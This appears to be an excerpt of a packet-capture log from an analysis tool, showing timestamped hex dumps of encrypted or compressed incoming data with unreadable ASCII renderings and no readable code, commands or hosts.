                                                                                                                                                2022-09-29 12:51:55 UTC33140INData Raw: 03 04 75 99 0b 32 7d 16 05 78 6c 77 1b 50 8a 78 d4 2b da 1d 07 bb f0 ab ad 5d b4 08 1a 3f 27 8b 00 c3 a3 fc 3c db c9 9e 4c 54 ca 7a 9d a1 0f 32 e1 23 d6 fa 6d 4d b0 dc 47 86 40 5b 70 83 3a 2f ae c7 ce de 36 4d f5 c4 58 dd b5 da a0 04 f6 86 45 34 cb b1 b2 90 e0 44 57 69 6a b0 43 ad 4b 4e 62 4d f6 88 41 8e 20 fe 54 76 f2 9f df 1c 23 8e fe 21 13 70 45 cb 6b 75 9e b2 0c 33 1f 22 3e 6a 14 a3 96 ae 0b d3 f2 ca 81 00 88 44 0a 8c 79 3c 06 60 8e bf 7b eb 1d 8b 62 c1 a5 ee 6e 8c f0 c3 9b a4 9c a0 66 e2 37 c1 08 bf 96 74 cc 14 99 19 d3 46 87 14 9a 41 2c cb 96 a7 d0 be c5 86 2f 52 46 95 bc 79 6f 95 a8 8f 5c 65 96 56 c4 23 06 ac 40 fd 77 87 5a c2 95 f6 90 27 4f 3f a6 65 8f 44 5a 04 ca 04 a9 9f fa a6 ef dc 43 0e aa ad 55 9d ab 02 54 c0 f3 3d fa 04 da 0d 0d 48 a4 69 f4
                                                                                                                                                Data Ascii: u2}xlwPx+]?'<LTz2#mMG@[p:/6MXE4DWijCKNbMA Tv#!pEku3">jDy<`{bnf7tFA,/RFyo\eV#@wZ'O?eDZCUT=Hi
                                                                                                                                                2022-09-29 12:51:55 UTC33156INData Raw: e3 16 57 3f 69 e9 d2 f8 c0 af cd ac ca b0 ee 7a 3b fd 2d 23 f0 b4 69 19 0f c4 0f 92 08 e8 43 6e ea 21 fd 83 8d b8 a9 ba 98 31 c5 3c d3 91 6e e6 e7 12 62 33 16 19 52 df 17 3b 73 e0 b8 01 b4 26 36 ed 3b 0c 9d 71 17 49 90 18 9f 91 49 3f c4 f0 4e f6 97 a9 85 3a 1f 23 04 fb 9e 6e 21 a8 35 68 64 fe 78 c4 53 f1 28 77 18 71 04 d3 34 e0 a0 f8 8f 5b 74 04 53 58 32 62 b7 0e 2b ca 10 ea 83 71 ed b4 86 1b 81 cb 7d 9e d3 7c 63 8b d2 05 43 c1 ec 0f 42 79 b4 fd 80 65 3f d3 bf 8f 30 0b d4 65 f7 86 95 f3 35 8c ce d3 eb 6f e2 68 a2 1d cf 2b ed ba e2 77 6b fa ef c4 79 da 5b 3f e7 2b 79 cf 84 24 b2 0a a0 c2 76 a9 c3 9c a2 40 6f 1e f0 88 d2 f3 e5 f4 fa fc 64 38 09 0e 48 6e 4b 71 e8 37 b3 8f c8 2d 14 33 05 7c 99 01 64 44 b0 1a b2 9c 11 50 03 52 c1 e8 7b fa 71 c9 0f 80 a5 19 7c
                                                                                                                                                Data Ascii: W?iz;-#iCn!1<nb3R;s&6;qII?N:#n!5hdxS(wq4[tSX2b+q}|cCBye?0e5oh+wky[?+y$v@od8HnKq7-3|dDPR{q|
                                                                                                                                                2022-09-29 12:51:55 UTC33172INData Raw: 1f ea 2b 23 77 96 30 87 db aa 24 f8 fe d3 d6 33 b2 7c 6e 15 a5 62 66 21 52 e6 f3 d8 de 68 85 40 81 8d 2a 68 91 29 11 70 8e 60 c5 53 f6 b9 04 5f 4c 63 4b 6b 07 80 95 ec ac fb de b1 ee e7 72 b1 64 b5 76 f2 09 a8 64 b0 8c c0 22 de bb e4 97 d9 ea 6f 0c a6 85 5f a7 4f 68 0c 0f 6c 0f 80 7b 16 16 ca 82 d5 a5 b8 25 49 cd 1d b6 9a 8f ac a7 36 e3 b8 de f9 9d 16 9c 49 49 c6 2e 65 f4 5e d6 91 02 41 3c 2d 7a 5a 30 8e 30 6d 6e ac b0 0d e2 43 b8 97 9d 9e 0c 88 43 97 43 fa 35 f3 a1 b7 ca 02 d9 d5 1b 2d 77 e2 a8 cd c1 9e b3 75 ad 26 b9 81 51 17 7f f1 e7 e0 b5 7f e8 a0 c6 b5 c1 78 2b 75 c4 5b 79 58 20 6f 1b 40 47 8e c4 a3 69 2f 82 34 87 48 12 cb 0e 4e 98 4c 15 59 a6 8b 64 32 08 77 a6 65 59 fe f1 5e fd 31 c3 7b 89 be e4 d6 95 fa f6 83 63 ea a6 33 91 7a fe 75 bb 11 e3 58 03
                                                                                                                                                Data Ascii: +#w0$3|nbf!Rh@*h)p`S_LcKkrdvd"o_Ohl{%I6II.e^A<-zZ00mnCCC5-wu&Qx+u[yX o@Gi/4HNLYd2weY^1{c3zuX
                                                                                                                                                2022-09-29 12:51:55 UTC33188INData Raw: 68 e2 ad b7 d9 fd dd 45 16 92 1b cb c2 bd 76 d3 8c c0 c3 74 c0 35 7e b8 f3 1e 21 b1 e9 5e f2 5e 38 c4 a7 a3 58 00 62 d2 8b ac 80 ba c6 e5 15 d7 aa ae 53 e6 32 80 82 d0 26 bc 83 9d fd 1c 1b 19 e9 dd 73 b4 8f 14 e8 21 a9 25 28 96 9b 67 34 4e fb d1 f5 39 69 ef ec cc c9 3e 27 d4 f6 3d f3 a8 c8 7f 79 f8 d6 56 a9 9e 7a 4f 76 d7 15 ae e6 94 5e e0 d6 a1 91 7f 84 a2 66 ae 01 48 57 f6 e4 af 10 9e 27 5d 02 66 4e 03 e0 c4 b6 4e ba 9b 01 4a 16 a1 1f 6b b5 fa 17 5b 35 51 82 9b 86 cb c8 62 b0 de 1e aa a9 e5 b9 34 9a cb 11 0c 9d b2 69 f0 5c 62 c9 2f d5 45 be db d0 7f e5 00 6c f6 8b 5b 80 f7 0f 51 79 2d b1 0f 5a 43 fc f2 ec c6 c2 4a db 3f bb 97 ee a8 47 1b 07 c0 fb ea 41 c1 45 88 cf d5 db a2 1c 07 61 87 2e 16 e7 b8 48 c4 de 1a 2f 74 11 13 0b f4 be a5 8c 8f 3c 89 93 95 06
                                                                                                                                                Data Ascii: hEvt5~!^^8XbS2&s!%(g4N9i>'=yVzOv^fHW']fNNJk[5Qb4i\b/El[Qy-ZCJ?GAEa.H/t<
                                                                                                                                                2022-09-29 12:51:55 UTC33204INData Raw: 47 c6 aa b5 41 35 89 1a e0 f0 f1 f0 9e c1 2c 08 09 a1 34 39 1f df 9b d7 26 b4 bc 00 6c 9e af 27 4b f6 af 4f 9b 6f 0f bb 71 d5 eb cf e5 f7 76 17 78 59 a7 86 35 30 83 9e 37 85 d4 98 b9 4e 42 07 b3 13 86 e0 24 8c 98 6e 88 f7 9a 57 94 9b 51 82 5e b3 67 c8 75 95 df 7f 0d ad a5 ff 29 fc e5 73 7c 2f b9 67 52 f2 b4 05 25 fe 7c 15 14 1c 95 36 c4 49 10 dc f9 93 86 d4 5e 2b 23 45 5a 52 71 e4 c9 53 50 d4 a9 be ad b2 c2 2c 2a 9f 9b 00 cd 9c 6c 6f ff e5 46 8e 17 e5 20 a2 dc 5e ca 1e dc 86 9c 3e cd 73 1e c0 94 84 1c 6d 5b 27 1a 1f b4 89 bb 3f 05 ff 1c 5b cc 79 a7 94 54 89 d6 c2 b4 43 ad 22 3c b8 a3 2b 3d fd c8 41 d9 c3 c4 3a 8c 0d 3a ba 1a 6e b5 3c 7c 8c 29 92 e9 e4 73 aa a2 f9 88 29 66 68 15 85 54 65 a3 53 7b 15 6b 46 59 0a d5 8d 23 31 12 a1 2f 48 24 9c 19 94 26 5c c5
                                                                                                                                                Data Ascii: GA5,49&l'KOoqvxY507NB$nWQ^gu)s|/gR%|6I^+#EZRqSP,*loF ^>sm['?[yTC"<+=A::n<|)s)fhTeS{kFY#1/H$&\
                                                                                                                                                2022-09-29 12:51:55 UTC33220INData Raw: 15 e3 8f b3 a9 76 f8 c9 92 ba 3d 55 62 1d d9 a3 68 0c e4 1d 8b 31 8a 10 09 d9 31 73 a3 a2 88 9f fa b5 2d 37 19 c4 c7 60 a8 98 26 01 ec e6 fd 5d fa 2e 18 27 8e 63 3d e9 80 33 c2 24 ad 1f 0c d7 64 99 30 ed 25 b9 30 90 2e d9 a6 8a ed 3e 5a 56 e3 89 f0 f1 d9 85 b0 5e 81 16 33 d9 c1 28 74 ff 0e a5 2c 0d 19 3e 33 bd 40 23 41 3e 11 af d4 81 ec db d1 6c 73 55 15 f4 62 4c c5 e0 45 e6 ee 4d 19 49 1e cd f9 4e 32 14 b1 70 80 87 c9 69 28 56 9b 90 ae 52 a6 60 09 4b a1 2b dc ca 0f fb a8 96 b1 49 e5 06 36 9c 02 62 75 c2 09 55 3e 8b 68 60 2b 9e 4c 01 96 14 46 45 4c 44 e7 45 57 2b 23 60 14 47 5c 21 3f 3c cf 95 d2 91 d6 50 d4 90 67 97 00 17 6d 62 73 85 a1 fd c9 a7 9e a2 ff 7b 03 0c 26 c7 d6 18 09 9f 34 bf 5d 70 99 4f b2 7f ed 7f 7e 0f 34 bd 1f bc 88 b8 87 7f 24 de b8 eb a0
                                                                                                                                                Data Ascii: v=Ubh11s-7`&].'c=3$d0%0.>ZV^3(t,>3@#A>lsUbLEMIN2pi(VR`K+I6buU>h`+LFELDEW+#`G\!?<Pgmbs{&4]pO~4$
                                                                                                                                                2022-09-29 12:51:55 UTC33236INData Raw: eb b8 46 48 ce a7 52 f1 bf 1b b3 e6 6e f6 98 64 ef 14 cf d1 87 a5 67 b1 3d 81 c6 70 63 c7 bf 35 f1 d7 e4 0d d7 0e c7 62 1a fa ad 8f 2b d2 a5 83 6e ac 2f 11 e1 8b 74 9e 36 51 1f cc 50 ba fa 21 f8 c7 22 0d 36 9c b3 6d d6 63 9e 66 41 7d a0 5f 3a e0 26 db 33 af ce 1a 2d 42 8d cb 4f fe 96 25 2e 08 ef fc 5c c9 63 45 29 e9 58 71 14 2f 24 28 40 e3 05 04 4b 6e 1f ef 84 00 53 26 67 dc be 4f 60 35 bc d3 86 d9 8f aa 79 76 1b 75 af 6d a2 52 25 8e 38 da f7 3e 2c 7b 6f 86 fe c2 40 fc 7f d1 7e 94 a1 43 2c f4 d9 15 a3 11 d5 07 00 7e 06 a8 36 9e 90 57 50 c4 d4 46 6c 9b 7f 4d 09 e2 e6 bd 8e 0c 99 28 3e 20 3b 16 6c be 8a d8 90 a9 61 a9 be 73 64 8a 11 56 57 19 cc 3e c1 e3 f0 d2 c9 64 ce ef 07 7b e2 d3 b8 e7 3b cf 1e 1a 50 13 a8 98 61 8f 41 a2 3c b7 a3 b3 7e 25 c3 e7 0d 97 88
                                                                                                                                                Data Ascii: FHRndg=pc5b+n/t6QP!"6mcfA}_:&3-BO%.\cE)Xq/$(@KnS&gO`5yvumR%8>,{o@~C,~6WPFlM(> ;lasdVW>d{;PaA<~%
                                                                                                                                                2022-09-29 12:51:55 UTC33252INData Raw: 24 c6 65 a0 a8 af 4c 3a 82 b9 2f c7 fc 4c b3 2e 89 92 c7 1b 5c 67 41 a9 0a 1b 65 a8 37 af 3d b8 7f ff 7a e4 a1 89 5c 8f 04 a3 2d df 95 c7 81 07 3f ab 7a 3f 5f d5 74 a4 b4 ff 65 c0 4c 45 24 8e 8f 0a 43 a4 0e ac f5 1a 2b d2 66 64 61 f0 a7 b9 43 89 e8 ba b8 ac 19 0e 76 18 c0 94 ab 79 d3 ab b5 5f 4a 25 ec f5 42 c3 b8 af 71 3b 83 a7 9a 10 ec 67 9b ef 56 fb 49 47 ae a2 a4 28 10 5e fc f9 b9 fe 54 61 c2 8d 2a b8 f1 c8 ff 64 c8 99 75 ee 06 d6 75 f3 05 49 cb 58 4b 46 f1 d3 ad b0 dc e9 c6 8a 51 e3 04 4a 5c 1f 0c d4 69 7a 4c 16 fc 58 9d 0a f3 4b cb 9c c6 32 2c 0e 6e fd 27 ff 46 73 80 d7 6f 2d 36 18 a3 93 96 54 0c c2 0c 57 b2 33 ea f3 b2 42 b3 87 43 a9 77 24 2c 74 b5 d9 36 2b 70 d9 5b 79 5c 11 2c ff 3f 1b 6d 49 e9 13 c9 b0 07 55 f0 4b 72 c1 1f 50 70 f1 22 4b c2 21 28
                                                                                                                                                Data Ascii: $eL:/L.\gAe7=z\-?z?_teLE$C+fdaCvy_J%Bq;gVIG(^Ta*duuIXKFQJ\izLXK2,n'Fso-6TW3BCw$,t6+p[y\,?mIUKrPp"K!(
                                                                                                                                                2022-09-29 12:51:55 UTC33268INData Raw: ac 18 89 74 93 5f d7 fb 35 39 5a 16 26 05 fc 4a c4 51 15 03 15 12 9b 19 d3 d7 b6 c9 c3 b4 3f 74 a8 fd 65 27 8c 22 88 93 92 cf 45 33 e0 ff 75 74 b2 b6 d0 0b 39 2a 2a 03 ee 23 5b 27 67 aa 6b 3b 60 4c 99 f0 3b 5d 40 61 fa 35 ad be a1 e0 57 97 32 cd ed a3 78 65 c9 53 91 a3 5d b8 89 9f 0d fc d3 6f 49 48 bf 23 6b fd 21 a7 79 2a 63 b3 fd 99 e1 1a 0d 82 7c ef 1d ab bc 19 59 03 6b 82 e9 62 f8 e3 0b 59 6a b4 d3 32 d7 7f 15 c7 86 3c 42 c5 d9 fc 78 fe 36 32 77 22 c7 87 3f 21 c4 5f 8b b1 72 36 bd 2a c1 bb 29 fa 6a 35 4a 99 f9 7e af 18 e0 6d e5 0f d7 91 5f b2 14 97 00 d8 15 cd f8 98 b5 a5 87 c0 05 d8 15 6b f5 d0 ed b2 7e b4 ac d4 d7 69 96 4b e9 01 41 ab 4b 28 2f 5a 81 93 3c ab e9 03 26 32 06 06 73 54 2b 11 95 4f ce ee 2d 86 82 43 df 7c 22 df 6b 30 67 e1 b2 87 60 e8 6b
                                                                                                                                                Data Ascii: t_59Z&JQ?te'"E3ut9**#['gk;`L;]@a5W2xeS]oIH#k!y*c|YkbYj2<Bx62w"?!_r6*)j5J~m_k~iKAK(/Z<&2sT+O-C|"k0g`k
                                                                                                                                                2022-09-29 12:51:55 UTC33284INData Raw: 3f ad 7a c6 cd 4b 96 bb 3d a6 c9 34 71 ab 78 6a cd da 2f f0 fa 6a dd 1f 9c da 71 78 1b b5 6f 2f d5 17 c1 ac 94 39 43 e0 f7 6c f9 dd 27 0c c3 d3 42 ab 1b fb 6f c7 41 d6 8d 03 d7 67 a8 46 f9 9b d4 e8 2f 05 53 76 e3 67 58 f4 c2 55 16 3d ce 3a 2e 9e 6d ab 02 f7 8f 59 59 7d 9f 77 fe 18 ae ed 66 ec ed 0d ab 28 1e bc 23 95 1e 3c a5 6d 72 39 e1 3e ce a5 e7 ff ff b1 96 58 27 0c 34 aa 03 79 13 66 fe 2d 15 22 46 a5 7a b9 9d d4 e1 19 82 4b 96 ca 3b c8 ef 0a 5d 81 90 64 4f a2 8f 9a e5 a8 c6 c7 57 9a d5 cf 50 aa ee 7c 28 a7 61 cb c4 45 53 ef 30 4a b5 49 77 6d 98 67 ba dc de b6 4d 3a f4 11 0d 55 65 f7 26 24 e5 6c 89 dc a0 73 43 26 7d 1c 45 41 b3 14 87 b6 c3 bc 86 46 f7 11 2b ce dc 21 41 f9 e7 58 55 71 56 76 52 dc 49 5e 63 c7 09 47 dc 91 1b 70 6d 84 26 28 d5 a5 1a c7 9f
                                                                                                                                                Data Ascii: ?zK=4qxj/jqxo/9Cl'BoAgF/SvgXU=:.mYY}wf(#<mr9>X'4yf-"FzK;]dOWP|(aES0JIwmgM:Ue&$lsC&}EAF+!AXUqVvRI^cGpm&(
                                                                                                                                                2022-09-29 12:51:55 UTC33300INData Raw: 5e 55 ff 79 df fd 3d 27 01 03 54 fa d9 a0 57 dd 84 7c 16 0f 5e be b5 47 ab 30 a1 c4 1f 24 ca 87 67 8d 98 ce 04 7f 3b bb 27 fc 8d 18 b6 db b1 e5 33 9f 93 79 d1 8f 10 22 6a c5 ea 5e 28 cc 81 a7 03 3a b9 85 bb 8b e6 3d 0d 90 f4 d0 c6 3a 30 e8 c2 2c f6 54 9b 39 db 79 df 60 f6 11 3d c3 84 4d e0 60 9e 6a 0a f6 2f 87 c7 bf f2 bb 60 43 4b d5 90 f0 3f ba 0f 06 62 18 d3 58 07 97 66 0a 19 91 ee 24 a2 48 80 c9 23 17 db 32 a7 67 fc d2 16 e4 be 68 fb 7c ed 0f 08 ad 6d 33 46 4d 61 04 2a 51 8b 08 c2 16 4e 30 ee 18 e3 da f0 e6 a0 10 fe aa 74 1c f0 39 e8 68 91 a9 9d d1 2f fc e9 2a 7c 5e 04 8b 07 27 27 0b 04 b3 4d 66 9e 2a 76 2c 43 ab fa 26 21 65 cd 07 19 af 7a c3 c4 65 d7 dc ca ec ea 3b 3b 4c 6b c0 ca 36 61 ab 7b fa ce 9a 63 58 66 c2 80 eb a7 61 4c f2 f2 5e 60 7b f0 22 4e
                                                                                                                                                Data Ascii: ^Uy='TW|^G0$g;'3y"j^(:=:0,T9y`=M`j/`CK?bXf$H#2gh|m3FMa*QN0t9h/*|^''Mf*v,C&!eze;;Lk6a{cXfaL^`{"N
                                                                                                                                                2022-09-29 12:51:55 UTC33316INData Raw: 46 7a cc 35 19 c3 4e a3 3e ba 6e dc e6 f8 47 73 d7 46 a7 d7 01 a0 8a 40 69 05 a8 13 73 c7 1b c5 37 20 2c 5e 4b 00 60 7f 06 2f 8f b3 6e 87 a4 c0 13 dc d4 e3 2c b8 b0 cb d1 cb a9 b2 45 56 29 87 34 c7 f0 c8 3d 5a 51 f0 64 2f 23 b5 ff 5b dc 38 57 99 31 38 67 4f 4c b6 3c 0b 88 e9 f2 f4 90 79 14 84 1c 24 84 5f f7 70 83 7c 9b 5d c4 49 2f 00 4e 2b b8 95 13 4f 71 da a7 ce 77 b8 c9 e3 29 36 ef 99 29 4c 6c f3 e0 a1 a7 51 6a 2b 55 6e 67 31 ea da 77 d8 2b 7e 11 31 56 6a 75 9e 6d 3c f0 d9 1d 04 a7 b2 f9 9e 2a d7 fc 75 44 21 3d fb 3a 1e 9f 4f 7d 96 8e 32 84 7e 08 32 8a 3c 28 aa 21 a5 1a cc 03 7d a9 1b 4e 86 9c f0 e1 e0 9f f3 e9 49 79 31 e0 13 bb e4 41 7c 86 16 93 78 7f 5f 5d a1 cd 75 30 0b ec 87 ce f6 ed 0e 65 2d 9a ce 8f fa 62 19 01 b7 5a b4 02 27 58 46 81 5b 23 0e ac
                                                                                                                                                Data Ascii: Fz5N>nGsF@is7 ,^K`/n,EV)4=ZQd/#[8W18gOL<y$_p|]I/N+Oqw)6)LlQj+Ung1w+~1Vjum<*uD!=:O}2~2<(!}NIy1A|x_]u0e-bZ'XF[#
                                                                                                                                                2022-09-29 12:51:55 UTC33332INData Raw: 76 d5 66 e7 1a 3e 34 ec 33 e1 b5 79 97 97 7b 50 02 5a 8a 4c 26 c5 ef 3b ae 31 6a 47 7b 73 f4 53 44 c0 b2 b4 b5 7f 86 dd 01 ad 65 d7 df b4 19 05 9d c0 28 c2 2e 7b 8d 87 7b bf e7 18 72 43 b5 e0 8c 55 b9 4f 0a 68 40 36 5e db 5c 46 8c 1b f0 35 e8 ee f5 3f b3 31 c8 a0 7e 0a 68 e4 01 50 8d 71 6f a6 92 ac 4e 43 09 46 7f 65 dc 61 8d 86 b0 2a 07 f1 05 c5 97 1b 8a 2c 2c 8b cc 15 3e bc 7e d5 ad 29 91 72 16 e5 73 d4 45 3b 65 51 31 8f 2e 0c fc 0e 5b 90 e5 a2 75 8d 7e 93 80 05 31 1e e5 eb 8a 58 b1 a3 e2 be b7 ce b8 57 47 9f a3 87 85 8f b0 a5 86 15 3e 2d 8e 37 00 19 2d 7f 61 99 9f de 97 6a ec 9e be 24 cd 67 ab aa 29 23 2d 82 a3 b0 41 3f 52 22 cd 0c 3a 2d 8e a5 65 8d 9b 51 7b d2 4e 14 c3 f2 93 59 6a 54 25 1c b1 36 40 a2 f0 b0 d3 50 27 5c 29 ad da d4 eb fc e9 58 14 bc c9
                                                                                                                                                Data Ascii: vf>43y{PZL&;1jG{sSDe(.{{rCUOh@6^\F5?1~hPqoNCFea*,,>~)rsE;eQ1.[u~1XWG>-7-aj$g)#-A?R":-eQ{NYjT%6@P'\)X
                                                                                                                                                2022-09-29 12:51:55 UTC33348INData Raw: bf e8 26 f6 d0 32 90 bf 15 3f d4 13 d6 b8 82 91 bb bc 23 5f 77 f4 82 e6 ed 9a 27 5e 46 b7 cb e6 c1 5a fb 67 18 df a0 e0 53 d7 5c d3 d5 84 7d a8 4e 9d cd 22 a7 a0 11 40 7a 37 35 4c ca 1a 6a 99 e6 e7 71 b5 03 02 77 2a 99 37 a9 3d 83 df f9 70 5f 92 a5 7b 30 51 30 e2 47 f8 a1 ef 0c 70 36 36 db 01 ab a4 96 f6 a7 f2 df c2 e6 0c 36 a3 4c fa f9 1a 58 e7 5d 82 3b 9a 2d 73 e2 a0 fb d5 2b 73 64 dd 90 bf d6 4f 9d 3c 56 76 5b 14 0a 83 d1 e2 c2 92 f2 2b a4 c6 90 b1 0e 14 b4 cb 98 74 e8 d2 63 39 9b 3c 8f 89 a5 1c 1e 29 00 67 1d d5 83 b8 b0 97 ae 2c c0 50 e6 3e a2 5b 02 a3 3e 25 05 5c 08 b1 91 e6 aa 30 5e e1 0c ee 08 ae 05 a7 84 8b f9 34 6e 13 9c 2e 00 a9 d7 53 55 a9 b0 ad 1a 7a 27 3b 9c fd bb e9 64 da e9 e1 e6 c3 93 b2 12 6a e4 e0 5f 42 6c 40 99 9e da 80 24 a8 e0 9e bd
                                                                                                                                                Data Ascii: &2?#_w'^FZgS\}N"@z75Ljqw*7=p_{0Q0Gp666LX];-s+sdO<Vv[+tc9<)g,P>[>%\0^4n.SUz';dj_Bl@$
                                                                                                                                                2022-09-29 12:51:55 UTC33364INData Raw: af 47 4a af 15 ed 51 51 fc 1d 5d d5 fc 2f 3f 45 dc 80 78 8e 52 55 15 bd 42 f5 bc 83 8f c6 f2 df ce f2 f5 83 84 1c 9c 16 c4 e0 57 21 34 54 99 bd cd fe b8 24 ae 90 bf b7 85 19 82 71 56 f0 1a bd fb 19 a5 f4 7a c6 8b 0e 0b 25 74 9b e6 f4 f9 72 4b 67 30 e6 63 28 2f 55 7b 43 1a 45 5f 60 30 dd 44 5e 28 07 f0 ae d1 51 66 fe 2b 40 ff 0a 5d 3b 49 64 2c 49 03 99 c2 02 6f a2 86 27 93 1e cc 31 7f 0c 80 b2 54 71 c2 d4 d4 00 66 86 ce 1e ab a6 cc e2 e0 4c 9d 53 03 de c5 40 57 57 ad 00 e3 b0 85 8d f9 bf 4e 21 c4 d6 6e 3d 7c e4 76 9e 4b 6b 50 71 be 4e 8f 42 3c ad 81 c1 2a f8 d5 4f 59 af 8c 3d c2 2e 1b ac 72 64 da 75 18 19 c5 88 f3 c6 43 0d 3d f8 5e c6 cc de 2a 85 41 e9 e5 21 ef 5a 75 9a bf 2a b2 a7 85 79 fb 2d 51 76 50 f2 56 f4 ba 60 a8 8b e0 eb 74 f0 2d 65 04 4c 63 33 47
                                                                                                                                                Data Ascii: GJQQ]/?ExRUBW!4T$qVz%trKg0c(/U{CE_`0D^(Qf+@];Id,Io'1TqfLS@WWN!n=|vKkPqNB<*OY=.rduC=^*A!Zu*y-QvPV`t-eLc3G
                                                                                                                                                2022-09-29 12:51:55 UTC33380INData Raw: 61 a8 d4 5d 53 be 9a e9 40 20 9b ea d7 0f 18 f6 36 b4 df 34 55 09 20 da 3d 19 b9 7a 69 93 87 d4 47 7d 26 7b 1e bd 0c 89 ea ee a5 f5 b6 18 2e aa 72 42 3e 9d f1 7e af be 3c 49 96 41 a8 f5 54 71 21 66 b2 43 df c4 55 fe 78 ad b6 86 47 1e 36 3c 8b 25 5c 23 88 14 54 22 21 de c0 f1 4a e8 14 01 2d 17 75 2f 04 02 dc a9 ff 5d 7b f4 b7 90 a4 12 64 f6 bf a7 d0 94 8c d4 51 9a 51 04 b4 79 25 fb 25 da 76 14 e6 82 84 b3 04 be 2c b2 d4 34 83 70 c7 27 d8 89 8b 83 52 22 ab c9 27 f0 45 3a 3c 3c 32 11 05 8a 4a 8b 90 e4 d4 fd aa 7b 75 af 37 1a cb b5 93 d4 6d fa 2d fd 93 67 2f 32 dd 34 59 fb 65 2a c2 b3 8f 35 39 68 77 d2 c6 c7 32 ce 8a fe ab a2 9c 86 7d 07 48 16 44 ec 8b 57 7d 23 54 60 09 fe c0 2e db b3 6e 24 2c 5f b0 ef 96 cd 09 f0 f2 c5 b4 74 f3 7a e7 da 6b 65 03 83 84 8e 94
                                                                                                                                                Data Ascii: a]S@ 64U =ziG}&{.rB>~<IATq!fCUxG6<%\#T"!J-u/]{dQQy%%v,4p'R"'E:<<2J{u7m-g/24Ye*59hw2}HDW}#T`.n$,_tzke
                                                                                                                                                2022-09-29 12:51:55 UTC33396INData Raw: b1 c1 65 68 c8 48 64 07 8d 83 fe 62 70 46 04 80 9f 1c 83 dd a0 f2 bf cf c6 9b 88 3c bc 0e a9 e1 82 db e9 11 4b 1d da 43 19 9c 50 f3 4c de 41 92 87 f9 5e 9d c2 ce 18 9e 97 e8 bd e8 87 c4 a6 65 67 e2 05 0f 6d d6 89 1c 87 52 19 a8 ff fc 0b 6d d4 ee 6c 14 b8 25 d7 22 65 ac 11 2b e1 49 ea 68 66 4d ea 6e 57 a1 9f e1 55 65 16 77 6b 7c 08 72 99 a9 d6 f6 c2 9c 9e fe 77 cd d9 a5 a4 b5 a6 82 1a da 68 8c 6f e0 91 61 42 87 85 fd c3 c2 d8 63 88 24 83 59 a5 49 e4 9e 85 85 bf c9 f5 72 c7 03 6c 71 90 42 4e 46 3a 71 e9 31 4c 4e 46 73 0b 36 28 4b 97 7c 6f b4 52 6c 9b 3e e2 cd a0 f9 93 d9 09 8a 99 57 03 44 e2 4c e7 d5 c1 5f a8 b2 50 c9 7b 97 70 3a 21 1c 93 26 85 8b 70 d2 24 3f 41 48 0b 43 9d 1b 74 6b 06 2c d3 f9 95 97 30 44 ee a6 34 98 ee 9f 9d 39 a3 44 59 1b ba 21 22 47 ba
                                                                                                                                                Data Ascii: ehHdbpF<KCPLA^egmRml%"e+IhfMnWUewk|rwhoaBc$YIrlqBNF:q1LNFs6(K|oRl>WDL_P{p:!&p$?AHCtk,0D49DY!"G
                                                                                                                                                2022-09-29 12:51:55 UTC33412INData Raw: b6 ab 82 73 1b 63 37 5b 7c 7f 35 ab 0f 0a ff 86 2a 4e 3a 16 b1 39 3a b0 36 34 0d 5b 59 fa 64 7f 86 f4 54 18 20 fc 10 9b de 1e f1 34 96 92 1f 68 83 02 de b5 fb 00 01 09 4f 48 02 88 88 ba 6b 4f 05 2f a5 d3 e6 59 e3 0e 4d 47 ed 26 d3 f1 d0 02 f4 1d 0c d2 42 98 61 9a 79 95 13 d2 cc d7 5a 3f 56 d6 6d bb a2 10 44 24 e4 9e a8 4b 5a b4 e2 4c 96 66 38 e1 04 bf 36 9f 9d c0 ce 0a 48 77 3a 85 ec 4f 25 a7 f1 ac 31 54 f9 1e 2b ac cc 92 32 41 b9 dc b9 fc cc f1 01 b8 33 53 c6 01 0b 18 1d 2d 89 b3 73 64 81 e1 7e 8e e0 90 ce 38 ab fb a2 2d e4 6a 65 fd 0e dc 91 ad 9c 4b 22 5a ca 0e 9f 89 e4 e3 53 ef 93 bb ea 92 35 29 e5 78 b9 4d a8 d3 ff 62 de 32 b9 35 9a 7c c3 a5 80 79 3d bd d1 73 3a 81 08 69 77 82 b1 3f 62 31 b3 85 3f f3 7a 40 ff b7 6e 88 e6 6a 76 30 60 1a 5a 66 1d bb 5b
                                                                                                                                                Data Ascii: sc7[|5*N:9:64[YdT 4hOHkO/YMG&BayZ?VmD$KZLf86Hw:O%1T+2A3S-sd~8-jeK"ZS5)xMb25|y=s:iw?b1?z@njv0`Zf[
                                                                                                                                                2022-09-29 12:51:55 UTC33428INData Raw: 7f ce a4 9a 8d b2 6b 9b 48 79 d1 f5 8b 08 c8 f7 b8 a2 c3 e2 5b cf c9 36 39 c5 ba 21 d9 14 69 e0 02 0c bc 9a 36 ff 8d 51 00 ff 74 61 bb 1a f0 f6 32 ba 2c bd 71 fa 68 1e 02 3d 1d fa b5 19 8c 1e 4e 05 8d f2 e3 4d 14 96 bb 2b e8 6a 47 a8 72 0d d5 39 f6 59 a1 cb da b5 9e 78 47 04 26 a1 32 dc e9 18 72 4f 1b 79 67 6a f0 1f cc f7 2e 47 2c a4 76 1c 69 58 5f aa 43 be 1e f9 8f d7 ab 71 1b e4 1b e3 b0 11 30 f5 73 7c b4 56 e3 1f 26 8b dd e5 ed fb 9e b0 dd 2a dc 09 53 b8 99 76 d1 3e 78 ff f1 a3 5f 1e 96 7d ab ba 74 62 3f 14 83 eb a1 cc 8d 45 f0 aa 0c 20 db c6 68 3d ca 5b 79 b0 20 1e 43 11 f9 b1 89 fd 8b d3 29 b4 f9 51 6f 17 9e b7 09 6b d8 87 f4 ce 2d ea b1 8d bb 0f 6f 30 a9 4c 89 5b 2d ac 8b 2c e5 5f cd d8 cb 56 6c 68 05 0a ac 78 85 cc 59 ea a4 5b ca 7a 63 dd e0 8c 10
                                                                                                                                                Data Ascii: kHy[69!i6Qta2,qh=NM+jGr9YxG&2rOygj.G,viX_Cq0s|V&*Sv>x_}tb?E h=[y C)Qok-o0L[-,_VlhxY[zc
